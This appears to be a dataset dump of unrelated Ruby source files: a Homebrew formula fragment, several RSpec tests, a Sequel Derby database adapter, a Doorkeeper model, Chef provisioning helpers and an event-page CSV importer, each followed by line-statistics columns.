sha256 "6da74df0e72ac657e659c951febdaf41b9ab4ee44115727a6e6e861c2ff20d3b" => :mojave
sha256 "c3ffb0fc4847f494c4a1067019bdf8869763d975dd54e4e2a45d513d8603d8ec" => :high_sierra
end
depends_on "node"
def install
system "npm", "install", *Language::Node.std_npm_install_args(libexec)
bin.install_symlink Dir["#{libexec}/bin/*"]
end
test do
assert_match "Logging in to balena-cloud.com",
shell_output("#{bin}/balena login --credentials --email [email protected] --password secret 2>/dev/null", 1)
end
end
| 35.62069 | 114 | 0.762827 |
fffbc805335e39fb20302342fadb94db21c547fa | 902 | require 'spec_helper'
describe Import::FogbugzController do
include ImportSpecHelper
let(:user) { create(:user) }
before do
sign_in(user)
end
describe 'GET status' do
before do
@repo = OpenStruct.new(name: 'vim')
stub_client(valid?: true)
end
it 'assigns variables' do
@project = create(:empty_project, import_type: 'fogbugz', creator_id: user.id)
stub_client(repos: [@repo])
get :status
expect(assigns(:already_added_projects)).to eq([@project])
expect(assigns(:repos)).to eq([@repo])
end
it 'does not show already added project' do
@project = create(:empty_project, import_type: 'fogbugz', creator_id: user.id, import_source: 'vim')
stub_client(repos: [@repo])
get :status
expect(assigns(:already_added_projects)).to eq([@project])
expect(assigns(:repos)).to eq([])
end
end
end
| 23.128205 | 106 | 0.650776 |
1c1921b8e69d69f61a10c06d0c2d0641075a6299 | 10,222 | # frozen-string-literal: true
Sequel::JDBC.load_driver('org.apache.derby.jdbc.EmbeddedDriver', :Derby)
require_relative 'transactions'
module Sequel
module JDBC
Sequel.synchronize do
DATABASE_SETUP[:derby] = proc do |db|
db.extend(Sequel::JDBC::Derby::DatabaseMethods)
db.dataset_class = Sequel::JDBC::Derby::Dataset
org.apache.derby.jdbc.EmbeddedDriver
end
end
module Derby
module DatabaseMethods
include ::Sequel::JDBC::Transactions
# Derby doesn't support casting integer to varchar, only integer to char,
# and char(254) appears to have the widest support (with char(255) failing).
# This does add a bunch of extra spaces at the end, but those will be trimmed
# elsewhere.
def cast_type_literal(type)
(type == String) ? 'CHAR(254)' : super
end
def database_type
:derby
end
def freeze
svn_version
super
end
# Derby uses an IDENTITY sequence for autoincrementing columns.
def serial_primary_key_options
{:primary_key => true, :type => Integer, :identity=>true, :start_with=>1}
end
# The SVN version of the database.
def svn_version
@svn_version ||= begin
v = synchronize{|c| c.get_meta_data.get_database_product_version}
v =~ /\((\d+)\)\z/
$1.to_i
end
end
# Derby supports transactional DDL statements.
def supports_transactional_ddl?
true
end
private
# Derby optimizes away Sequel's default check of SELECT NULL FROM table,
# so use a SELECT * FROM table there.
def _table_exists?(ds)
ds.first
end
def alter_table_sql(table, op)
case op[:op]
when :rename_column
"RENAME COLUMN #{quote_schema_table(table)}.#{quote_identifier(op[:name])} TO #{quote_identifier(op[:new_name])}"
when :set_column_type
# Derby is very limited in changing a column's type, so adding a new column and then dropping the existing column is
# the best approach, as mentioned in the Derby documentation.
temp_name = :x_sequel_temp_column_x
[alter_table_sql(table, op.merge(:op=>:add_column, :name=>temp_name)),
from(table).update_sql(temp_name=>::Sequel::SQL::Cast.new(op[:name], op[:type])),
alter_table_sql(table, op.merge(:op=>:drop_column)),
alter_table_sql(table, op.merge(:op=>:rename_column, :name=>temp_name, :new_name=>op[:name]))]
when :set_column_null
"ALTER TABLE #{quote_schema_table(table)} ALTER COLUMN #{quote_identifier(op[:name])} #{op[:null] ? 'NULL' : 'NOT NULL'}"
else
super
end
end
# Derby does not allow adding primary key constraints to NULLable columns.
def can_add_primary_key_constraint_on_nullable_columns?
false
end
# Derby doesn't allow specifying NULL for columns, only NOT NULL.
def column_definition_null_sql(sql, column)
null = column.fetch(:null, column[:allow_null])
sql << " NOT NULL" if null == false || (null.nil? && column[:primary_key])
end
# Add NOT LOGGED for temporary tables to improve performance.
def create_table_sql(name, generator, options)
s = super
s += ' NOT LOGGED' if options[:temp]
s
end
# Insert data from the current table into the new table after
# creating the table, since it is not possible to do it in one step.
def create_table_as(name, sql, options)
super
from(name).insert(sql.is_a?(Dataset) ? sql : dataset.with_sql(sql))
end
# Derby currently only requires WITH NO DATA, with a separate insert
# to import data.
def create_table_as_sql(name, sql, options)
"#{create_table_prefix_sql(name, options)} AS #{sql} WITH NO DATA"
end
# Temporary table creation on Derby uses DECLARE instead of CREATE.
def create_table_prefix_sql(name, options)
if options[:temp]
"DECLARE GLOBAL TEMPORARY TABLE #{quote_identifier(name)}"
else
super
end
end
DATABASE_ERROR_REGEXPS = {
/The statement was aborted because it would have caused a duplicate key value in a unique or primary key constraint or unique index/ => UniqueConstraintViolation,
/violation of foreign key constraint/ => ForeignKeyConstraintViolation,
/The check constraint .+ was violated/ => CheckConstraintViolation,
/cannot accept a NULL value/ => NotNullConstraintViolation,
/A lock could not be obtained due to a deadlock/ => SerializationFailure,
}.freeze
def database_error_regexps
DATABASE_ERROR_REGEXPS
end
# Use IDENTITY_VAL_LOCAL() to get the last inserted id.
def last_insert_id(conn, opts=OPTS)
statement(conn) do |stmt|
sql = 'SELECT IDENTITY_VAL_LOCAL() FROM sysibm.sysdummy1'
rs = log_connection_yield(sql, conn){stmt.executeQuery(sql)}
rs.next
rs.getLong(1)
end
end
# Handle nil values by using setNull with the correct parameter type.
def set_ps_arg_nil(cps, i)
cps.setNull(i, cps.getParameterMetaData.getParameterType(i))
end
# Derby uses RENAME TABLE syntax to rename tables.
def rename_table_sql(name, new_name)
"RENAME TABLE #{quote_schema_table(name)} TO #{quote_schema_table(new_name)}"
end
# Primary key indexes appear to be named sqlNNNN on Derby
def primary_key_index_re
/\Asql\d+\z/i
end
# If an :identity option is present in the column, add the necessary IDENTITY SQL.
def type_literal(column)
if column[:identity]
sql = "#{super} GENERATED BY DEFAULT AS IDENTITY"
if sw = column[:start_with]
sql += " (START WITH #{sw.to_i}"
sql << " INCREMENT BY #{column[:increment_by].to_i}" if column[:increment_by]
sql << ")"
end
sql
else
super
end
end
# Derby uses clob for text types.
def uses_clob_for_text?
true
end
def valid_connection_sql
@valid_connection_sql ||= select(1).sql
end
end
class Dataset < JDBC::Dataset
# Derby doesn't support an expression between CASE and WHEN,
# so remove conditions.
def case_expression_sql_append(sql, ce)
super(sql, ce.with_merged_expression)
end
# If the type is String, trim the extra spaces since CHAR is used instead
# of varchar. This can cause problems if you are casting a char/varchar to
# a string and the ending whitespace is important.
def cast_sql_append(sql, expr, type)
if type == String
sql << "RTRIM("
super
sql << ')'
else
super
end
end
def complex_expression_sql_append(sql, op, args)
case op
when :%, :'B~'
complex_expression_emulate_append(sql, op, args)
when :&, :|, :^, :<<, :>>
raise Error, "Derby doesn't support the #{op} operator"
when :**
sql << 'exp('
literal_append(sql, args[1])
sql << ' * ln('
literal_append(sql, args[0])
sql << "))"
when :extract
sql << args[0].to_s << '('
literal_append(sql, args[1])
sql << ')'
else
super
end
end
# Derby supports GROUP BY ROLLUP (but not CUBE)
def supports_group_rollup?
true
end
# Derby does not support IS TRUE.
def supports_is_true?
false
end
# Derby does not support IN/NOT IN with multiple columns
def supports_multiple_column_in?
false
end
private
def empty_from_sql
" FROM sysibm.sysdummy1"
end
# Derby needs a hex string casted to BLOB for blobs.
def literal_blob_append(sql, v)
sql << "CAST(X'" << v.unpack("H*").first << "' AS BLOB)"
end
# Derby needs the standard workaround to insert all default values into
# a table with more than one column.
def insert_supports_empty_values?
false
end
# Newer Derby versions can use the FALSE literal, but older versions need an always false expression.
def literal_false
if db.svn_version >= 1040133
'FALSE'
else
'(1 = 0)'
end
end
# Derby handles fractional seconds in timestamps, but not in times
def literal_sqltime(v)
v.strftime("'%H:%M:%S'")
end
# Newer Derby versions can use the TRUE literal, but older versions need an always true expression.
def literal_true
if db.svn_version >= 1040133
'TRUE'
else
'(1 = 1)'
end
end
# Derby supports multiple rows for VALUES in INSERT.
def multi_insert_sql_strategy
:values
end
# Emulate the char_length function with length
def native_function_name(emulated_function)
if emulated_function == :char_length
'length'
else
super
end
end
# Offset comes before limit in Derby
def select_limit_sql(sql)
if o = @opts[:offset]
sql << " OFFSET "
literal_append(sql, o)
sql << " ROWS"
end
if l = @opts[:limit]
sql << " FETCH FIRST "
literal_append(sql, l)
sql << " ROWS ONLY"
end
end
end
end
end
end
| 32.868167 | 172 | 0.575426 |
e2c732c6838eef1f7b42b56b9fa4d8a6eecadbdf | 701 | Pod::Spec.new do |spec|
spec.name = 'CETableViewBindingHelper'
spec.version = '1.0.0'
spec.license = {
:type => 'MIT',
:file => 'MIT-LICENSE.txt'
}
spec.homepage = 'https://github.com/Advanced-Jewish-Technologies/CETableViewBinding'
spec.authors = {
'Dark Satyr' => '[email protected]'
}
spec.summary = 'ReactiveCocoa TableView Binding Helper.'
spec.source = { git: 'https://github.com/Advanced-Jewish-Technologies/CETableViewBinding.git',
tag: spec.version.to_s }
spec.platform = :ios, '8.0'
spec.requires_arc = true
spec.source_files = '*.{h,m}'
spec.dependency 'ReactiveObjC', '~> 3.1'
end
| 31.863636 | 102 | 0.610556 |
f7423b8ca65e7db7416538db5cd32687c34838dc | 3,849 | # ****************************************************************************
#
# Copyright (c) Microsoft Corporation.
#
# This source code is subject to terms and conditions of the Apache License, Version 2.0. A
# copy of the license can be found in the License.html file at the root of this distribution. If
# you cannot locate the Apache License, Version 2.0, please send an email to
# [email protected]. By using this source code in any fashion, you are agreeing to be bound
# by the terms of the Apache License, Version 2.0.
#
# You must not remove this notice, or any other, from this software.
#
#
# ****************************************************************************
require '../../util/assert.rb'
# When a method is called, Ruby searches for it in a number of places in the following order:
#
# - Among the methods defined in that object (i.e., singleton methods).
# - Among the methods defined by that object's class.
# - Among the methods of the modules included by that class.
# - Among the methods of the superclass.
# - Among the methods of the modules included by that superclass.
# - Repeats Steps 4 and 5 until the top-level object is reached.
class My
def method1; 10; end
def method2; 20; end
end
x = My.new
assert_equal(x.method1, 10)
assert_raise(NoMethodError) { x.method_not_exists }
class << x
def method2; 30; end
def method3; 40; end
end
assert_equal(x.method1, 10)
assert_equal(x.method2, 30)
assert_equal(x.method3, 40)
assert_raise(NoMethodError) { x.method_not_exists }
# include module
module Simple
def method1; -10; end
def method2; -20; end
end
class My_with_module
include Simple
def method2; 20; end
def method3; 30; end
end
x = My_with_module.new
assert_equal(x.method1, -10)
assert_equal(x.method2, 20)
assert_equal(x.method3, 30)
assert_raise(NoMethodError) { x.method_not_exists }
class << x
def method4; 40; end
end
assert_equal(x.method1, -10)
assert_equal(x.method2, 20)
assert_equal(x.method3, 30)
assert_equal(x.method4, 40)
assert_raise(NoMethodError) { x.method_not_exists }
# with superclass
class My_base
def method6; -600; end
def method7; -700; end
end
class My_derived < My_base
def method7; 700; end
def method8; 800; end
end
x = My_derived.new
assert_equal(x.method6, -600)
assert_equal(x.method7, 700)
assert_equal(x.method8, 800)
assert_raise(NoMethodError) { x.method_not_exists }
# base with included module
class My_base_with_module
include Simple
def method6; -600; end
def method7; -700; end
end
class My_derived2 < My_base_with_module
def method2; 200; end
def method7; 700; end
def method8; 800; end
end
x = My_derived2.new
assert_equal(x.method1, -10)
assert_equal(x.method2, 200)
assert_equal(x.method6, -600)
assert_equal(x.method7, 700)
assert_equal(x.method8, 800)
assert_raise(NoMethodError) { x.method_not_exists }
class << x
end
assert_equal(x.method1, -10)
assert_equal(x.method2, 200)
assert_equal(x.method6, -600)
assert_equal(x.method7, 700)
assert_equal(x.method8, 800)
assert_raise(NoMethodError) { x.method_not_exists }
# multiple levels
class My_level1
include Simple
def method1; 100; end
end
class My_level2 < My_level1
def method2; 200; end
end
class My_level3 < My_level2
def method3; 300; end
end
x = My_level3.new
assert_equal(x.method1, 100)
assert_equal(x.method2, 200)
assert_equal(x.method3, 300)
assert_raise(NoMethodError) { x.method_not_exists }
# access control related to inheritance: the public override method in superclass
class My_base_with_public_method
public
def method; 100; end
end
class My_derived_with_private_method < My_base_with_public_method
private
def method; 200; end
end
x = My_derived_with_private_method.new
#assert_raise(NoMethodError) { x.method } | 24.673077 | 97 | 0.708756 |
18ac151d570c0d32933eb7841d991baf1434043e | 1,003 | # frozen_string_literal: true
module Doorkeeper
class AccessGrant < ActiveRecord::Base
belongs_to :resource, polymorphic: true
self.table_name = "#{table_name_prefix}oauth_access_grants#{table_name_suffix}".to_sym
include AccessGrantMixin
include ActiveModel::MassAssignmentSecurity if defined?(::ProtectedAttributes)
belongs_to_options = {
class_name: "Doorkeeper::Application",
inverse_of: :access_grants
}
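    # Rails 5 makes belongs_to associations required by default, so the
    # application association is explicitly marked optional below to preserve
    # the previous behaviour.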
if defined?(ActiveRecord::Base) && ActiveRecord::VERSION::MAJOR >= 5
belongs_to_options[:optional] = true
end
belongs_to :application, belongs_to_options
validates :resource, :application_id, :token, :expires_in, :redirect_uri, presence: true
validates :token, uniqueness: true
before_validation :generate_token, on: :create
private
# Generates token value with UniqueToken class.
#
# @return [String] token value
#
def generate_token
self.token = UniqueToken.generate
end
end
end
| 26.394737 | 92 | 0.720837 |
e238466e60eba41a9fbb60e83f2a446907cc2a06 | 387 | class CreateLicenses < ActiveRecord::Migration
def change
create_table :licenses do |t|
t.integer :profile_id
t.string :license_type
t.string :unit
t.string :title
t.date :publish_at
t.text :source
t.string :source_link
t.text :origin_desc
t.text :memo
t.timestamps
end
add_index :licenses, :profile_id
end
end
| 21.5 | 46 | 0.640827 |
874b60cc754a1c70f1333c79929f02b5594dcf52 | 717 | module Rucc
class Parser
module Goto
private
# @return [Node]
def read_goto_stmt
if next_token?('*')
          # [GNU] computed goto. "goto *p" jumps to the address pointed to by p.
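          # For example (illustrative only), GNU C source such as:
          #   void *targets[] = { &&retry, &&done };
          #   goto *targets[i];
          # reaches this branch; the expression after '*' must evaluate to a pointer.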
tok = peek
expr = read_cast_expr
if expr.ty.kind != Kind::PTR
Util.errort!(tok, "pointer expected for computed goto, but got #{expr}")
end
return Node.ast_computed_goto(expr)
end
tok = get
if !tok || (tok.kind != T::IDENT)
Util.errort!(tok, "identifier expected, but got #{tok}")
end
expect!(';')
r = Node.ast_goto(tok.sval)
@gotos.push(r)
r
end
end
end
end
| 23.9 | 84 | 0.521618 |
4ac921e224b0de7e9027d2f612684d8467362f8e | 39 | module Reports::BasicDetailsHelper
end
| 13 | 34 | 0.871795 |
4ada5d1d2e73945d899fca4b9570648722052991 | 492 | # frozen_string_literal: true
RSpec.describe "copy_static_files", type: :rake do
before do
subject.execute
end
after(:all) do
cleanup
end
it "has the correct name" do
expect(subject.name).to eq("copy_static_files")
end
it "copy network security config xml " do
expect(File.open("rake/static_files/network_security_config.xml").read)
.to be_equivalent_to(File.open("app/src/main/res/xml/network_security_config.xml").read)
end
def cleanup; end
end
| 21.391304 | 94 | 0.721545 |
6a168e6f3031dba7dcbf5a3f31909f372f47395d | 267 | module EbayTrading # :nodoc:
module Types # :nodoc:
class SellerDashboardAlertSeverityCode
extend Enumerable
extend Enumeration
Informational = 'Informational'
Warning = 'Warning'
StrongWarning = 'StrongWarning'
end
end
end
| 20.538462 | 42 | 0.685393 |
1d8f0818a651040d19e54ca1a0c2e05a1faa92c8 | 5,446 | # encoding: UTF-8
require 'securerandom'
module Server
module Helpers
#
# ChefServer Module
#
# This module provides helpers related to the Chef Server Component
module ChefServer
module_function
# Password of the Provisioning User
# Generate or load the password of the provisioning user in chef-server
#
# @param node [Chef::Node] Chef Node object
# @return [String] password of the provisioning user
def provisioning_password(node)
@provisioning_password ||= begin
if File.exist?("#{Server::Helpers.provisioning_data_dir(node)}/provisioning_password")
File.read("#{Server::Helpers.provisioning_data_dir(node)}/provisioning_password")
elsif node['provisioning']['chef-server']['provisioning_password']
node['provisioning']['chef-server']['provisioning_password']
else
SecureRandom.base64(20)
end
end
end
# Upload a specific cookbook to our chef-server
#
# @param node [Chef::Node] Chef Node object
# @param cookbook [String] Cookbook Name
def upload_cookbook(node, cookbook)
execute "Upload Cookbook => #{cookbook}" do
command "knife cookbook upload #{cookbook} --cookbook-path #{Chef::Config[:cookbook_path]}"
environment(
'KNIFE_HOME' => Server::Helpers.provisioning_data_dir(node)
)
not_if "knife cookbook show #{cookbook}"
end
end
# Get the Hostname of the Chef Server
#
# @param node [Chef::Node] Chef Node object
# @return hostname [String] The hostname of the chef-server
def chef_server_hostname(node)
Server::Helpers::Component.component_hostname(node, 'chef-server')
end
# Returns the FQDN of the Chef Server
#
# @param node [Chef::Node] Chef Node object
# @return [String]
def chef_server_fqdn(node)
@chef_server_fqdn ||= begin
chef_server_node = Chef::Node.load(chef_server_hostname(node))
Server::Helpers::Component.component_fqdn(node, 'chef-server', chef_server_node)
end
end
# Returns the Chef Server URL of our Organization
#
# @param node [Chef::Node] Chef Node object
# @return [String] chef-server url
def chef_server_url(node)
"https://#{chef_server_fqdn(node)}/organizations/#{node['provisioning']['chef-server']['organization']}"
end
# Generates the Chef Server Attributes
#
# @param node [Chef::Node] Chef Node object
# @return [Hash] chef-server attributes
def chef_server_attributes(node)
@chef_server_attributes = {
'chef-server-12' => {
'provisioner' => {
'organization' => node['provisioning']['chef-server']['organization'],
'password' => provisioning_password(node)
},
'api_fqdn' => chef_server_fqdn(node),
'store_keys_databag' => false,
'plugin' => {
'reporting' => node['provisioning']['chef-server']['enable-reporting']
}
}
}
@chef_server_attributes = Chef::Mixin::DeepMerge.hash_only_merge(
@chef_server_attributes,
Server::Helpers::Analytics.analytics_server_attributes(node)
)
@chef_server_attributes = Chef::Mixin::DeepMerge.hash_only_merge(
@chef_server_attributes,
Server::Helpers::Supermarket.supermarket_server_attributes(node)
)
@chef_server_attributes = Chef::Mixin::DeepMerge.hash_only_merge(
@chef_server_attributes,
Server::Helpers::Component.component_attributes(node, 'chef-server')
)
@chef_server_attributes
end
# Chef Server Config
# This is used by all the `machine` resources to point to our chef-server
# and any interaction we have with the chef-server like data-bags, roles, etc.
#
# @param node [Chef::Node] Chef Node object
# @return [Hash] chef-server attributes
def chef_server_config(node)
{
chef_server_url: chef_server_url(node),
options: {
client_name: 'provisioner',
signing_key_filename: "#{Server::Helpers.provisioning_data_dir(node)}/provisioner.pem"
}
}
end
end
end
# Module that exposes multiple helpers
module DSL
# Password of the Provisioning User
def provisioning_password
Server::Helpers::ChefServer.provisioning_password(node)
end
# Upload a cookbook to the chef-server
def upload_cookbook(cookbook)
Server::Helpers::ChefServer.upload_cookbook(node, cookbook)
end
# Get the Hostname of the Chef Server
def chef_server_hostname
Server::Helpers::ChefServer.chef_server_hostname(node)
end
# Return the chef-server config
def chef_server_config
Server::Helpers::ChefServer.chef_server_config(node)
end
# Return the FQDN of the Chef Server
def chef_server_fqdn
Server::Helpers::ChefServer.chef_server_fqdn(node)
end
# Return the Chef Server URL of our Organization
def chef_server_url
Server::Helpers::ChefServer.chef_server_url(node)
end
# Generate the Chef Server Attributes
def chef_server_attributes
Server::Helpers::ChefServer.chef_server_attributes(node)
end
end
end
| 33.826087 | 112 | 0.641572 |
bf5de704a7f50061fe88b981f9d21b8ccf34ad2d | 783 | class ManageIQ::Providers::Microsoft::InfraManager::Vm < ManageIQ::Providers::InfraManager::Vm
include_concern 'ManageIQ::Providers::Microsoft::InfraManager::VmOrTemplateShared'
POWER_STATES = {
"Running" => "on",
"Paused" => "suspended",
"Saved" => "suspended",
"PowerOff" => "off",
}.freeze
def self.calculate_power_state(raw_power_state)
POWER_STATES[raw_power_state] || super
end
def validate_migrate
validate_unsupported("Migrate")
end
def proxies4job(_job = nil)
{
:proxies => [MiqServer.my_server],
:message => 'Perform SmartState Analysis on this VM'
}
end
def has_active_proxy?
true
end
def has_proxy?
true
end
def validate_publish
validate_unsupported("Publish VM")
end
end
| 20.605263 | 94 | 0.675607 |
3347a55583c861879eb8479abad607c17e5be3d4 | 4,020 | # Encoding: utf-8
# Cloud Foundry Java Buildpack
# Copyright 2013-2017 the original author or authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require 'spec_helper'
require 'component_helper'
require 'java_buildpack/framework/introscope_agent'
describe JavaBuildpack::Framework::IntroscopeAgent do
include_context 'component_helper'
let(:configuration) do
{ 'default_agent_name' => "$(expr \"$VCAP_APPLICATION\" : '.*application_name[\": ]*\\([A-Za-z0-9_-]*\\).*')" }
end
let(:vcap_application) do
{ 'application_name' => 'test-application-name',
'application_uris' => %w(test-application-uri-0 test-application-uri-1) }
end
it 'does not detect without introscope-n/a service' do
expect(component.detect).to be_nil
end
context do
let(:credentials) { {} }
before do
allow(services).to receive(:one_service?).with(/introscope/, 'host-name').and_return(true)
allow(services).to receive(:find_service).and_return('credentials' => credentials)
end
it 'detects with introscope-n/a service' do
expect(component.detect).to eq("introscope-agent=#{version}")
end
it 'expands Introscope agent zip',
cache_fixture: 'stub-introscope-agent.tar' do
component.compile
expect(sandbox + 'Agent.jar').to exist
end
it 'raises error if host-name not specified' do
expect { component.release }.to raise_error(/'host-name' credential must be set/)
end
context do
let(:credentials) { { 'host-name' => 'test-host-name' } }
it 'updates JAVA_OPTS' do
component.release
expect(java_opts).to include('-javaagent:$PWD/.java-buildpack/introscope_agent/Agent.jar')
expect(java_opts).to include('-Dcom.wily.introscope.agentProfile=$PWD/.java-buildpack/introscope_agent/core' \
'/config/IntroscopeAgent.profile')
expect(java_opts).to include('-Dintroscope.agent.defaultProcessName=test-application-name')
expect(java_opts).to include('-Dintroscope.agent.hostName=test-application-uri-0')
expect(java_opts).to include('-Dintroscope.agent.enterprisemanager.transport.tcp.host.DEFAULT=test-host-name')
expect(java_opts).to include('-Dcom.wily.introscope.agent.agentName=$(expr "$VCAP_APPLICATION" : ' \
'\'.*application_name[": ]*\\([A-Za-z0-9_-]*\\).*\')')
end
context do
let(:credentials) { super().merge 'agent-name' => 'another-test-agent-name' }
it 'adds agent-name from credentials to JAVA_OPTS if specified' do
component.release
expect(java_opts).to include('-Dcom.wily.introscope.agent.agentName=another-test-agent-name')
end
end
context do
let(:credentials) { super().merge 'port' => 'test-port' }
it 'adds port from credentials to JAVA_OPTS if specified' do
component.release
expect(java_opts).to include('-Dintroscope.agent.enterprisemanager.transport.tcp.port.DEFAULT=test-port')
end
end
context do
let(:credentials) { super().merge 'ssl' => 'true' }
it 'adds ssl socket factory from credentials to JAVA_OPTS if specified' do
component.release
expect(java_opts).to include('-Dintroscope.agent.enterprisemanager.transport.tcp.socketfactory.DEFAULT=' \
'com.wily.isengard.postofficehub.link.net.SSLSocketFactory')
end
end
end
end
end
| 35.263158 | 118 | 0.670647 |
ff44a235ea5993c09552a385bff9c58086db4c11 | 5,162 | # frozen_string_literal: true
require 'spec_helper'
require_dependency 'active_model'
RSpec.describe ::Gitlab::Ci::Config::Entry::Product::Matrix do
subject(:matrix) { described_class.new(config) }
describe 'validations' do
before do
matrix.compose!
end
context 'when entry config value is correct' do
let(:config) do
[
{ 'VAR_1' => [1, 2, 3], 'VAR_2' => [4, 5, 6] },
{ 'VAR_3' => %w[a b], 'VAR_4' => %w[c d] }
]
end
describe '#valid?' do
it { is_expected.to be_valid }
end
end
context 'when entry config generates too many jobs' do
let(:config) do
[
{
'VAR_1' => (1..10).to_a,
'VAR_2' => (11..20).to_a
}
]
end
describe '#valid?' do
it { is_expected.not_to be_valid }
end
describe '#errors' do
it 'returns error about too many jobs' do
expect(matrix.errors)
.to include('matrix config generates too many jobs (maximum is 50)')
end
end
end
context 'when entry config has only one variable with multiple values' do
let(:config) do
[
{
'VAR_1' => %w[build test]
}
]
end
describe '#valid?' do
it { is_expected.to be_valid }
end
describe '#errors' do
it 'returns no errors' do
expect(matrix.errors)
.to be_empty
end
end
describe '#value' do
before do
matrix.compose!
end
it 'returns the value without raising an error' do
expect(matrix.value).to eq([{ 'VAR_1' => %w[build test] }])
end
end
context 'when entry config has only one variable with one value' do
let(:config) do
[
{
'VAR_1' => %w[test]
}
]
end
describe '#valid?' do
it { is_expected.to be_valid }
end
describe '#errors' do
it 'returns no errors' do
expect(matrix.errors)
.to be_empty
end
end
describe '#value' do
before do
matrix.compose!
end
it 'returns the value without raising an error' do
expect(matrix.value).to eq([{ 'VAR_1' => %w[test] }])
end
end
end
end
context 'when config value has wrong type' do
let(:config) { {} }
describe '#valid?' do
it { is_expected.not_to be_valid }
end
describe '#errors' do
it 'returns error about incorrect type' do
expect(matrix.errors)
.to include('matrix config should be an array of hashes')
end
end
end
end
describe '.compose!' do
context 'when valid job entries composed' do
let(:config) do
[
{ PROVIDER: 'aws', STACK: %w[monitoring app1 app2] },
{ STACK: %w[monitoring backup app], PROVIDER: 'ovh' },
{ PROVIDER: 'gcp', STACK: %w[data processing], ARGS: 'normal' },
{ PROVIDER: 'vultr', STACK: 'data', ARGS: 'store' }
]
end
before do
matrix.compose!
end
describe '#value' do
it 'returns key value' do
expect(matrix.value).to match(
[
{ 'PROVIDER' => %w[aws], 'STACK' => %w[monitoring app1 app2] },
{ 'PROVIDER' => %w[ovh], 'STACK' => %w[monitoring backup app] },
{ 'ARGS' => %w[normal], 'PROVIDER' => %w[gcp], 'STACK' => %w[data processing] },
{ 'ARGS' => %w[store], 'PROVIDER' => %w[vultr], 'STACK' => %w[data] }
]
)
end
end
describe '#descendants' do
it 'creates valid descendant nodes' do
expect(matrix.descendants.count).to eq(config.size)
expect(matrix.descendants)
.to all(be_an_instance_of(::Gitlab::Ci::Config::Entry::Product::Variables))
end
end
end
context 'with empty config' do
let(:config) { [] }
before do
matrix.compose!
end
describe '#value' do
it 'returns empty value' do
expect(matrix.value).to eq([])
end
end
end
end
describe '#number_of_generated_jobs' do
before do
matrix.compose!
end
subject { matrix.number_of_generated_jobs }
context 'with empty config' do
let(:config) { [] }
it { is_expected.to be_zero }
end
context 'with only one variable' do
let(:config) do
[{ 'VAR_1' => (1..10).to_a }]
end
it { is_expected.to eq(10) }
end
context 'with two variables' do
let(:config) do
[{ 'VAR_1' => (1..10).to_a, 'VAR_2' => (1..5).to_a }]
end
it { is_expected.to eq(50) }
end
context 'with two sets of variables' do
let(:config) do
[
{ 'VAR_1' => (1..10).to_a, 'VAR_2' => (1..5).to_a },
{ 'VAR_3' => (1..2).to_a, 'VAR_4' => (1..3).to_a }
]
end
it { is_expected.to eq(56) }
end
end
end
| 23.463636 | 94 | 0.506974 |
6ac6b360d08143c85e6a2f26c26f215fba3d713f | 4,197 | class Event::Page::CsvImporter
include Cms::CsvImportBase
self.required_headers = [ Event::Page.t(:filename) ]
attr_reader :site, :node, :user
def initialize(site, node, user)
@site = site
@node = node
@user = user
end
def import(file, opts = {})
@task = opts[:task]
put_log("import start " + ::File.basename(file.name))
import_csv(file)
end
private
def model
Event::Page
end
def put_log(message)
if @task
@task.log(message)
else
Rails.logger.info(message)
end
end
def import_csv(file)
table = CSV.read(file.path, headers: true, encoding: 'SJIS:UTF-8')
table.each_with_index do |row, i|
begin
item = update_row(row)
put_log("update #{i + 1}: #{item.name}")
rescue => e
put_log("error #{i + 1}: #{e}")
end
end
end
def update_row(row)
filename = "#{node.filename}/#{row[model.t(:filename)]}"
item = model.find_or_initialize_by(site_id: site.id, filename: filename)
raise I18n.t('errors.messages.auth_error') unless item.allowed?(:import, user, site: site, node: node)
item.site = site
set_page_attributes(row, item)
raise I18n.t('errors.messages.auth_error') unless item.allowed?(:import, user, site: site, node: node)
if item.save
item
else
raise item.errors.full_messages.join(", ")
end
end
def value(row, key)
row[model.t(key)].try(:strip)
end
def ary_value(row, key)
row[model.t(key)].to_s.split(/\n/).map(&:strip)
end
def label_value(item, row, key)
item.send("#{key}_options").to_h[value(row, key)]
end
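  # Resolves slash-separated category name paths (e.g. "Parent/Child") into category
  # node ids by matching the last path segment's name and depth under a category/*
  # route and checking that the ancestor names match the rest of the path.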
def category_name_tree_to_ids(name_trees)
category_ids = []
name_trees.each do |cate|
names = cate.split("/")
last_index = names.size - 1
last_name = names[last_index]
parent_names = names.slice(0...(names.size - 1))
cond = { name: last_name, depth: last_index + 1, route: /^category\// }
node_ids = Cms::Node.site(site).where(cond).pluck(:id)
node_ids.each do |node_id|
cate = Cms::Node.find(node_id)
if parent_names == cate.parents.pluck(:name)
category_ids << cate.id
end
end
end
category_ids
end
def set_page_attributes(row, item)
# basic
layout = Cms::Layout.site(site).where(name: value(row, :layout)).first
item.name = value(row, :name)
item.index_name = value(row, :index_name)
item.layout = layout
item.order = value(row, :order)
# meta
item.keywords = value(row, :keywords)
item.description = value(row, :description)
item.summary_html = value(row, :summary_html)
# body
item.html = value(row, :html)
# event body
item.schedule = value(row, :schedule)
item.venue = value(row, :venue)
item.content = value(row, :content)
item.cost = value(row, :cost)
item.related_url = value(row, :related_url)
item.contact = value(row, :contact)
# category
category_name_tree = ary_value(row, :categories)
category_ids = category_name_tree_to_ids(category_name_tree)
categories = Category::Node::Base.site(site).in(id: category_ids)
#if node.st_categories.present?
# filenames = node.st_categories.pluck(:filename)
# filenames += node.st_categories.map { |c| /^#{c.filename}\// }
# categories = categories.in(filename: filenames)
#end
item.category_ids = categories.pluck(:id)
# event
item.event_name = value(row, :event_name)
item.event_dates = value(row, :event_dates)
# related pages
page_names = ary_value(row, :related_pages)
item.related_page_ids = Cms::Page.site(site).in(filename: page_names).pluck(:id)
# crumb
item.parent_crumb_urls = value(row, :parent_crumb)
# released
item.released = value(row, :released)
item.release_date = value(row, :release_date)
item.close_date = value(row, :close_date)
# groups
group_names = ary_value(row, :groups)
item.group_ids = SS::Group.in(name: group_names).pluck(:id)
item.permission_level = value(row, :permission_level)
# state
state = label_value(item, row, :state)
item.state = state || "public"
end
end
| 26.732484 | 106 | 0.641172 |
